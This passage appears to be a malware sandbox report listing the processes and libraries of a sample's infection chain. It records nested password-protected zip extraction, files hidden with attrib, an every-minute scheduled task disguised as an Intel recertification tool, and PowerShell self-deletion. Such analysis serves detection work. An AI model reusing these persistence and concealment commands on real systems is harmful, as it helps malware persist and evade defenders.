                            Source: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                            Source: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6316 -s 656
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exe "C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exe"
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeProcess created: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exe "C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exe"
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exe "C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exe"
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe "C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe"
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeProcess created: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe "C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe"
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeProcess created: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe "C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\random.exe_Y.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exe "C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exe "C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exe "C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exe "C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe "C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextractedJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextractedJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextractedJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextractedJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTEJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exeJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
                            Source: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeProcess created: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exe "C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exe"
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeProcess created: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe "C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe"
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeProcess created: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe "C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe"
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: mstask.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: dui70.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: duser.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: chartv.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: oleacc.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: atlthunk.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: wtsapi32.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: winsta.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: textshaping.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: explorerframe.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\System32\mode.comSection loaded: ulib.dllJump to behavior
                            Source: C:\Windows\System32\mode.comSection loaded: ureg.dllJump to behavior
                            Source: C:\Windows\System32\mode.comSection loaded: fsutilext.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                            Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeSection loaded: apphelp.dll
                            Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                            Source: C:\Windows\explorer.exeSection loaded: msvcp140.dll
                            Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
                            Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
                            Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                            Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                            Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
                            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\explorer.exeSection loaded: napinsp.dll
                            Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dll
                            Source: C:\Windows\explorer.exeSection loaded: wshbth.dll
                            Source: C:\Windows\explorer.exeSection loaded: nlaapi.dll
                            Source: C:\Windows\explorer.exeSection loaded: winrnr.dll
                            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exeSection loaded: winmm.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
